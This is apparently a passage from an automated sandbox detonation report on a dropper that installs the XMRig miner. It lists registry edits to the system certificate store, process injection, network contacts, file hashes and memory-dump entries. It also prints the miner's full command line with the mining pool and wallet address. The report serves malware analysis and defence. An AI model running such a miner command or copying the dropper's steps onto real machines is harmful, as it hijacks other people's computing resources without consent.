memory/5028-46-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-47-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-48-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-49-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-50-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-51-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-52-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-53-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-54-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-55-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-56-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-57-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-58-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-59-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-60-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-61-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-62-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-63-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-64-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-65-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-66-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-67-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-68-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-69-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-70-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-71-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-72-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-73-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-74-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-75-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-76-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-77-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-78-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-79-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-80-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-81-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-82-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-83-0x00007FF765E80000-0x00007FF766983000-memory.dmp
memory/5028-84-0x00007FF765E80000-0x00007FF766983000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:51
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4428 wrote to memory of 3956 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4428 wrote to memory of 3956 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3956-16-0x000001308B070000-0x000001308B090000-memory.dmp
memory/3956-17-0x000001308C880000-0x000001308C8A0000-memory.dmp
memory/3956-18-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-19-0x000001308C8C0000-0x000001308C8E0000-memory.dmp
memory/3956-20-0x000001308C8A0000-0x000001308C8C0000-memory.dmp
memory/3956-21-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-22-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-23-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-24-0x000001308C8C0000-0x000001308C8E0000-memory.dmp
memory/3956-25-0x000001308C8A0000-0x000001308C8C0000-memory.dmp
memory/3956-26-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-27-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-28-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-29-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-30-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-31-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-32-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-33-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-34-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-35-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-36-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-37-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-38-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-39-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-40-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-41-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-42-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-43-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-44-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-45-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-46-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-47-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-48-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-49-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-50-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-51-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-52-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-53-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-54-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-55-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-56-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-57-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-58-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-59-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-60-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-61-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-62-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-63-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-64-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-65-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-66-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-67-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-68-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-69-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-70-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-71-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-72-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-73-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-74-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-75-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-76-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-77-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-78-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-79-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-80-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-81-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-82-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-83-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
memory/3956-84-0x00007FF79EE40000-0x00007FF79F943000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101f